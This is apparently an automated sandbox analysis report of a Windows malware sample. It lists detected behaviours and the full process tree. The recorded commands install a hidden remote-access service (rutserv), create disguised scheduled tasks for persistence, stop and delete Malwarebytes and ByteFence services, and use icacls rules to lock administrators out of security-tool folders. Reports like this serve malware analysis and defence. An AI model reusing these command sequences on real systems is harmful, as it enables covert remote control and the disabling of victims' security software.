Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2056 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 1976 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2604 wrote to memory of 1976 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2604 wrote to memory of 1976 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2604 wrote to memory of 1028 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\net.exe
PID 2604 wrote to memory of 1028 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\net.exe
PID 2604 wrote to memory of 1028 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\net.exe
PID 1976 wrote to memory of 8 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1976 wrote to memory of 8 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1976 wrote to memory of 8 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 8 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 8 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 8 wrote to memory of 3512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 8 wrote to memory of 3512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 8 wrote to memory of 3512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 8 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 8 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 8 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 8 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 8 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 8 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 8 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 8 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 8 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 8 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 8 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 8 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2056 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\programdata\install\cheat.exe
PID 2056 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\programdata\install\cheat.exe
PID 2056 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\programdata\install\cheat.exe
PID 1184 wrote to memory of 1388 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1184 wrote to memory of 1388 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1184 wrote to memory of 1388 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 2056 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\System32\Conhost.exe
PID 2056 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\System32\Conhost.exe
PID 2056 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\System32\Conhost.exe
PID 2056 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2056 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\update.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\update.exe

"C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

